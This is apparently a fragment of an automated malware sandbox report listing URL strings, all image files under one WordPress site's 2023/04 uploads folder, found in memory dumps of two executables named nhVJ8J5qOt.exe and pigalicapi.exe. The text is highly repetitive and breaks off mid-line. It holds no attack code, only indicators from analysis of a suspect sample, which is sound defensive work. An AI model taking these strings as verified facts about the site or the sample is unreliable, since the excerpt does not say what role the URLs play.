                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_2.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_3.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_4.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_5.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_6.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile123.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile234.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile456ENDE.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobilr567.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/N123.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/SimonJabocWEBDE.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitgreen-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-180x180.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-192x192.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 